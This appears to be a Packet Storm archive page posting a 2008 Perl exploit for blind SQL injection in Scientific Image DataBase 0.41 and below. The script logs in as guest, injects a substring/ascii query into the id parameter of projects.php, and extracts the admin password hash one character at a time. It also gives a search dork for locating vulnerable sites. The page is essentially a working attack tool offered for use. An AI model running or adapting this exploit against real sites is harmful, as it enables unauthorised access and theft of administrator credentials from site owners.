exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

scientific-sql.txt

scientific-sql.txt
Posted Jun 23, 2008
Authored by t0pp8uzz

Scientific Image Database versions 0.41 and below blind SQL injection exploit.

tags | exploit, sql injection
SHA-256 | 4c5181d2a6bad520c38bb0aaff33be9658f0047fe56295a72e7e00c1342e9fa3

scientific-sql.txt

Change Mirror Download
#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;

# Download: http://sidb.sourceforge.net/
# Dork: "Scientific Image DataBase"
# This exploit retrives the admin username/password via blind mysql injection.


print <<INFO; # heredocs is ugly.. so is my INFO ;)
-------------------------------------
- Scientific Image DataBase <= 0.41 -
- Blind SQL Injection Exploit -
- -
- Coded && Discovered By: t0pP8uZz -
- Discovered On: 19 JUNE 2008 -
-------------------------------------
-Greetz: muts, perlunderground, h-y -
- cipher, milw0rm -
-------------------------------------

INFO

print "Enter URL(ie: http://site.com): ";
chomp(my $url=<STDIN>);

my ($substr, $done, $chr, $res) = (1, 1, 48, "");

my $ua = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', cookie_jar => {} );
$ua->post($url."/login.php", { 'logon' => 'true', 'user' => 'guest', 'pwd' => 'guest', 'submit' => 'Login' } );

while($done) {
my $content = $ua->get($url."/projects.php?show=true&id=57%20and%20ascii(substring((select%20pwd%20from%20users%20where%20userid=1),".$substr.",1))=".$chr);

if($content->content =~ /Not meant/ && length($res) == 32) { $done = 0; }
elsif($content->content !~ /Not meant/) { $res .= chr($chr); $substr++; $chr = 48; }
else { $chr++; }
}
print "Username: sysadmin Password: ".$res."\n";
exit;

Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    25 Files
  • 16
    Aug 16th
    3 Files
  • 17
    Aug 17th
    6 Files
  • 18
    Aug 18th
    4 Files
  • 19
    Aug 19th
    12 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close